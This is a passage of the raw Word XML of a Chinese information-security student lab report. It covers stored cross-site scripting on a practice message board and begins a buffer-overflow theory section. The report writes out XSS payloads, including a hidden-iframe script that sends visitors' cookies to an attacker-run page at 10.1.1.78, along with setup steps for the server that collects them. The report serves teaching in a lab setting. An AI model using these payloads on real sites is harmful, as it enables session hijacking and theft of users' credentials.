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7D60F" w14:textId="67013215" w:rsidR="005429D2" w:rsidRPr="00AA0F1D" w:rsidRDefault="005429D2" w:rsidP="005429D2">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00AA0F1D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实验一</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0F1D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0F1D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>典型攻击行为验证</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33EB2C2B" w14:textId="79A54DB2" w:rsidR="00476DF0" w:rsidRPr="00AA0F1D" w:rsidRDefault="00476DF0" w:rsidP="004C62F7">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="84"/>
          <w:szCs w:val="84"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B7666BD" w14:textId="722687C4" w:rsidR="00476DF0" w:rsidRDefault="00476DF0" w:rsidP="004C62F7">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="84"/>
          <w:szCs w:val="84"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B336EE7" w14:textId="77777777" w:rsidR="00AA0F1D" w:rsidRPr="00AA0F1D" w:rsidRDefault="00AA0F1D" w:rsidP="004C62F7">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="84"/>
          <w:szCs w:val="84"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58571861" w14:textId="1E941A65" w:rsidR="00476DF0" w:rsidRPr="0014516E" w:rsidRDefault="00476DF0" w:rsidP="0014516E">
      <w:pPr>
        <w:ind w:firstLineChars="900" w:firstLine="2880"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0014516E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>班级：1703202</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C54745" w14:textId="68310A70" w:rsidR="00476DF0" w:rsidRPr="0014516E" w:rsidRDefault="00476DF0" w:rsidP="0014516E">
      <w:pPr>
        <w:ind w:firstLineChars="900" w:firstLine="2880"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0014516E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>学号：1170300421</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C6A535D" w14:textId="20F10598" w:rsidR="00476DF0" w:rsidRPr="0014516E" w:rsidRDefault="0014516E" w:rsidP="0014516E">
      <w:pPr>
        <w:ind w:firstLineChars="900" w:firstLine="2880"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0014516E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>专业：信息安全</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5970585B" w14:textId="2C9F3EE0" w:rsidR="0014516E" w:rsidRPr="0014516E" w:rsidRDefault="0014516E" w:rsidP="0014516E">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0014516E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>日期：2020.10.18</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="351A1349" w14:textId="479C43D5" w:rsidR="0014516E" w:rsidRPr="0014516E" w:rsidRDefault="0014516E" w:rsidP="004C62F7">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="84"/>
          <w:szCs w:val="84"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50E32C1A" w14:textId="361FC699" w:rsidR="0014516E" w:rsidRPr="0014516E" w:rsidRDefault="0014516E" w:rsidP="004C62F7">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="84"/>
          <w:szCs w:val="84"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C12BDA9" w14:textId="77777777" w:rsidR="0014516E" w:rsidRPr="0014516E" w:rsidRDefault="0014516E" w:rsidP="004C62F7">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="84"/>
          <w:szCs w:val="84"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="674524FE" w14:textId="7602F3AD" w:rsidR="0014516E" w:rsidRPr="0014516E" w:rsidRDefault="0014516E" w:rsidP="004C62F7">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="84"/>
          <w:szCs w:val="84"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11C523BC" w14:textId="77777777" w:rsidR="0014516E" w:rsidRPr="00476DF0" w:rsidRDefault="0014516E" w:rsidP="00476DF0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="345A003C" w14:textId="7BA51565" w:rsidR="005429D2" w:rsidRPr="005429D2" w:rsidRDefault="005429D2" w:rsidP="005429D2">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>实验</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1-1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：跨站</w:t>
      </w:r>
      <w:r>
        <w:t>脚本攻击</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E89421" w14:textId="79DC3753" w:rsidR="0088197E" w:rsidRDefault="005429D2" w:rsidP="0088197E">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>一</w:t>
      </w:r>
      <w:r w:rsidR="0088197E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>、简单阐述跨站脚本攻击原理</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D842B1C" w14:textId="77777777" w:rsidR="00B8183C" w:rsidRPr="00B8183C" w:rsidRDefault="00B8183C" w:rsidP="0030071C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8183C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>它是通过对网页注入可执行代码且成功地被浏览器执行，达到攻击的目的，形成了一次有效XSS攻击，一旦攻击成功，它可以获取用户的联系人列表，然后向联系人发送虚假诈骗信息，可以删除用户的日志等等，有时候还和其他攻击方式同时实施比如SQL注入攻击服务器和数据库、Click劫持、相对链接劫持等实施钓鱼，它带来的危害是巨大的，是web安全的头号大敌。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0276C3AB" w14:textId="77777777" w:rsidR="00B8183C" w:rsidRPr="00B8183C" w:rsidRDefault="00B8183C" w:rsidP="0030071C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8183C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>执行条件：需要向</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8183C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>web页面注入恶意代码；这些恶意代码能够被浏览器成功的执行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32733ACA" w14:textId="4331BFD3" w:rsidR="006213F1" w:rsidRDefault="00B8183C" w:rsidP="0030071C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8183C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>攻击方式</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>主要有</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8183C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>：存储型攻击：恶意代码被保存到目标网站的服务器中，这种攻击具有较强的稳定性和持久性，比较常见场景是在博客，论坛等社交网站上；反射型攻击：意代码并没有保存在目标网站，通过引诱用户点击一个链接到目标网站的恶意链接来实施攻击的</w:t>
      </w:r>
      <w:r w:rsidR="001124BE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6698DFE9" w14:textId="10DECE50" w:rsidR="0042725B" w:rsidRDefault="005429D2" w:rsidP="00B8183C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>二</w:t>
      </w:r>
      <w:r w:rsidR="0042725B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>、给出本次实验的结果，截图等</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11CA1054" w14:textId="77777777" w:rsidR="005429D2" w:rsidRPr="005429D2" w:rsidRDefault="005429D2" w:rsidP="005429D2">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005429D2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>预备任务：熟悉留言系统</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07EE161B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 在预备任务中，我们将安装在目标主机上的跨站脚本攻击演练平台（留言系统）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53D2C813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 1、使用远程桌面登录至练习主机。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58525891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 2、使用浏览器打开http://10.1.1.2页面，进入跨站脚本攻击演练平台，如下图所示：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4073C0D8" w14:textId="0D57AC9B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3CBEA9E" wp14:editId="66F949A9">
            <wp:extent cx="5274310" cy="1784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0D3" w14:textId="467E9F7B" w:rsidR="005429D2" w:rsidRDefault="005429D2" w:rsidP="00B8183C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia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 3、给留言系统添加留言，熟悉本系统环境。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0174B49D" w14:textId="104A3B89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769244A" wp14:editId="3D917535">
            <wp:extent cx="5274310" cy="2600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E2B9" w14:textId="77777777" w:rsidR="005429D2" w:rsidRPr="005429D2" w:rsidRDefault="005429D2" w:rsidP="005429D2">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005429D2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>任务一：存储式跨站脚本测试</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F95DA95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在留言内容中填写包含有跨站测试的脚本，提交后观察返回效果。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02EF5016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    &lt;script&gt;alert("XSS TEST")&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ADAC2FA" w14:textId="3FE6CE62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BC661BC" wp14:editId="64A05EDC">
            <wp:extent cx="3840813" cy="209568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59AD" w14:textId="5A91F1E3" w:rsidR="005429D2" w:rsidRDefault="005429D2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刷新留言系统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，查看效果：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BF97053" w14:textId="277F51FD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989741" wp14:editId="6D2E6255">
            <wp:extent cx="5274310" cy="2515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BAD2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思考：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="280DEA0D" w14:textId="47CE341A" w:rsidR="005429D2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 测试当其他用户打开这个页面时，嵌入的代码是否会执行？分析留言系统代码，为什么填写的留言脚本会被执行？</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CB19772" w14:textId="5E945206" w:rsidR="00117EF7" w:rsidRPr="00D65203" w:rsidRDefault="00117EF7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 xml:space="preserve">   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答：会被执行。插入的代码a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>lert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格式是前端的一种格式，系统把留言的内容当成</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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j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>avascript</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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代码进行了执行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B82B525" w14:textId="77777777" w:rsidR="005429D2" w:rsidRPr="005429D2" w:rsidRDefault="005429D2" w:rsidP="005429D2">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005429D2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>任务二：存储式跨站漏洞的简单利用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BB2B737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增加一留言，并在留言内容中改为 &lt;iframe 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src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="http://www.hit.edu.cn"&gt;&lt;/iframe&gt;，测试返回效果。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A791B2B" w14:textId="56D81B97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C2B663A" wp14:editId="27FDC2DF">
            <wp:extent cx="4877223" cy="39093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2C3" w14:textId="042579E6" w:rsidR="005429D2" w:rsidRDefault="005429D2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隐藏恶意网页。增加留言，内容包含以下语句：&lt;iframe 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src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=http://today.hit.edu.cn width="0" height="0"&gt;&lt;/iframe&gt;，观察返回状态，并解释原因。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CC22CFF" w14:textId="7B1B8AEA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732A3D" wp14:editId="60284ED5">
            <wp:extent cx="5052498" cy="10287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31EF" w14:textId="245C6DD8" w:rsidR="00117EF7" w:rsidRDefault="00117EF7" w:rsidP="00B8183C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通过将该网页的长和高显示为0，使其没有页面空间显示，进而达到隐藏恶意网页的目的。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66CA5A5B" w14:textId="77777777" w:rsidR="005429D2" w:rsidRPr="005429D2" w:rsidRDefault="005429D2" w:rsidP="005429D2">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005429D2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>实验任务三：利用存储式跨站漏洞窃取用户</w:t>
      </w:r>
      <w:r w:rsidRPr="005429D2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>cookie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10871CF7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继续添加留言，包含以下内容：&lt;script&gt;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document.write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(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document.cookie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)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A6EEC93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 结果如图所示：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33799A71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60B829" wp14:editId="0B2CED04">
            <wp:simplePos x="1143000" y="3634740"/>
            <wp:positionH relativeFrom="column">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:align>top</wp:align>
            </wp:positionV>
            <wp:extent cx="4839119" cy="1120237"/>
            <wp:effectExtent l="0" t="0" r="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</w:rPr>
        <w:br w:type="textWrapping" w:clear="all"/>
      </w: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继续添加留言，包含以下内容：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B26B2F2" w14:textId="77777777" w:rsidR="005429D2" w:rsidRPr="00D65203" w:rsidRDefault="005429D2" w:rsidP="005429D2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  &lt;script&gt;alert(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document.cookie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)&lt;/script&gt;，比较有什么区别？</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1724B33A" w14:textId="3649CA27" w:rsidR="005429D2" w:rsidRDefault="005429D2" w:rsidP="00B8183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F9D4857" wp14:editId="2FED1BA1">
            <wp:extent cx="5052498" cy="16079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0BC4" w14:textId="3C795A1D" w:rsidR="005429D2" w:rsidRDefault="005429D2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使用管理员登录，观察显示的cookie有什么不同</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1682EAD2" w14:textId="0FD8546E" w:rsidR="001B03FA" w:rsidRDefault="00FE4D64" w:rsidP="00B8183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没有不同。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C121B4D" w14:textId="37773D6D" w:rsidR="005429D2" w:rsidRDefault="001B03FA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思考：这种窃取cookie的方式有什么缺点？有什么方法可以将用户的cookie窃取出并保存下来，而且用户看不到？</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="747C4ED8" w14:textId="478042D8" w:rsidR="001B03FA" w:rsidRDefault="00FE4D64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 xml:space="preserve">   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答：容易被用户发现。可以通过在攻击机上搭建w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>eb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服务器，进而保存和浏览用户c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>ookie</w:t>
      </w:r>
      <w:r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。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="211BBAF5" w14:textId="55260B74" w:rsidR="001B03FA" w:rsidRDefault="001B03FA" w:rsidP="00B8183C">
      <w:pPr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在攻击机上使用提供的页面搭建WEB服务器，以便保存浏览用户的cookie。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F9245C5" w14:textId="68428E20" w:rsidR="001B03FA" w:rsidRDefault="001B03FA" w:rsidP="00B8183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510BB35" wp14:editId="0519D127">
            <wp:extent cx="5274310" cy="15474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547D" w14:textId="0D8A0217" w:rsidR="001B03FA" w:rsidRDefault="001B03FA" w:rsidP="00B8183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D62B0ED" wp14:editId="1D32CC92">
            <wp:extent cx="5274310" cy="3822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6BFB" w14:textId="77777777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搭建IIS服务器过程中应注意如下几点：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A925B45" w14:textId="77777777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lastRenderedPageBreak/>
        <w:t>    1）在Web服务扩展中允许Active Server Pages服务</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FF779EF" w14:textId="69ECE4D1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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
          <w:color w:val="555555"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w: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 2）默认网站-属性-文档中添加index.asp内容页。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="027EE4EE" w14:textId="680C4C15" w:rsidR="001B03FA" w:rsidRDefault="001B03FA" w:rsidP="001B03FA">
      <w:pPr>
        <w:ind w:firstLineChars="100" w:firstLine="180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3）在：C:\\tools\\跨站脚本攻击\\中的cookies文件夹属性-安全-组或用户名称（G）-添加-高级-立即查找中找到IUSR_BJHIT-YXI7NEFU8用户，选择并确定</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ACFB984" w14:textId="424B29B7" w:rsidR="001B03FA" w:rsidRDefault="001B03FA" w:rsidP="001B03FA">
      <w:pPr>
        <w:ind w:firstLineChars="100" w:firstLine="21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943B4FA" wp14:editId="4582B449">
            <wp:extent cx="5235394" cy="515156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7DB9" w14:textId="77777777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4)给IUSR_BJHIT-YXI7NEFU8用户写入权限</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="588C191C" w14:textId="392D283B" w:rsidR="001B03FA" w:rsidRDefault="001B03FA" w:rsidP="001B03FA">
      <w:pPr>
        <w:ind w:firstLineChars="100" w:firstLine="21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72D171F" wp14:editId="07DCB58A">
            <wp:extent cx="4625741" cy="504487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22A6" w14:textId="10F944A6" w:rsidR="001B03FA" w:rsidRDefault="001B03FA" w:rsidP="001B03FA">
      <w:pPr>
        <w:ind w:firstLineChars="100" w:firstLine="180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搭建好后，在浏览器中输入本机IP地址进行测试，如下图所示：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45CB5D36" w14:textId="4561F7C5" w:rsidR="001B03FA" w:rsidRDefault="001B03FA" w:rsidP="001B03FA">
      <w:pPr>
        <w:ind w:firstLineChars="100" w:firstLine="21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31636F3" wp14:editId="544403A0">
            <wp:extent cx="5274310" cy="981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5C5D" w14:textId="77777777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返回http://10.1.1.2页面，继续添加留言，包含以下内容：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64923B9E" w14:textId="77777777" w:rsidR="001B03FA" w:rsidRPr="00D65203" w:rsidRDefault="001B03FA" w:rsidP="001B03FA">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:after="120" w:line="375" w:lineRule="atLeast"/>
        <w:jc w:val="left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     &lt;script&gt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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document.write</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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("&lt;iframe width=0 height=0 src='http://10.1.1.78/cookie.asp?cookie="+document.cookie+"'&gt;&lt;/iframe&gt;");&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A6B1D67" w14:textId="1247DA48" w:rsidR="001B03FA" w:rsidRDefault="001B03FA" w:rsidP="001B03FA">
      <w:pPr>
        <w:ind w:firstLineChars="100" w:firstLine="21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ACE02A6" wp14:editId="1C48513B">
            <wp:extent cx="5197290" cy="1021168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C44F" w14:textId="6955F1AB" w:rsidR="001B03FA" w:rsidRDefault="001B03FA" w:rsidP="001B03FA">
      <w:pPr>
        <w:ind w:firstLineChars="100" w:firstLine="180"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia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再打开本地页面，查看接收浏览用户的cookie接收情况：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CE54DE1" w14:textId="61B41B8A" w:rsidR="001B03FA" w:rsidRDefault="001B03FA" w:rsidP="001B03FA">
      <w:pPr>
        <w:ind w:firstLineChars="100" w:firstLine="21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BE5AD21" wp14:editId="402E1CA5">
            <wp:extent cx="5274310" cy="9671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7A7D" w14:textId="32E260BA" w:rsidR="001B03FA" w:rsidRDefault="001B03FA" w:rsidP="001B03FA">
      <w:pPr>
        <w:ind w:firstLineChars="100" w:firstLine="180"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
          <w:color w:val="555555"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D65203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可以看到，已经接收到用户的cookie了，这些cookie包含了所有浏览该页面的信息，如果是登录用户的话，cookie包含了用户的用户名与密码信息。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35748B6D" w14:textId="414A85F0" w:rsidR="00395F66" w:rsidRPr="005429D2" w:rsidRDefault="00395F66" w:rsidP="00395F66">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实验</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1-2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：缓冲区溢出实验结果</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31A581E2" w14:textId="6F21CD85" w:rsidR="00395F66" w:rsidRPr="00FE4D64" w:rsidRDefault="00FE4D64" w:rsidP="00FE4D64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FE4D64">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>分析缓冲区溢出的原理。根据这2个程序，详细说明基于堆和栈的缓冲区溢出的原理</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4D64">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26B0FE8A" w14:textId="33B6BF5D" w:rsidR="00FE4D64" w:rsidRDefault="00EA5C10" w:rsidP="0030071C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="420" w:firstLine="480"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA5C10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>缓冲区溢出，针对程序设</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA5C10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>bai计缺陷，du向程序输入缓冲区写入使之溢出的内容（通常是超过缓冲区能保存</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EA5C10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>dao</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EA5C10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>的最大数据量的数据），从而破坏程序运行、趁著中断之际并获取程序乃至系统的控制权。</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA5C10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>原理：通过往程序的缓冲区写超出其长度的内容，造成缓冲区的溢出，从而破坏程序的堆栈，造成程序崩溃或使程序转而执行其它指令，以达到攻击的目的。造成缓冲区溢出的原因是程序中没有仔细检查用户输入的参数。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FDAFAB1" w14:textId="77777777" w:rsidR="00A462C6" w:rsidRDefault="00EA5C10" w:rsidP="0030071C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="42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基于栈的</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4D64">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>缓冲区溢出的原理</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA5C10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
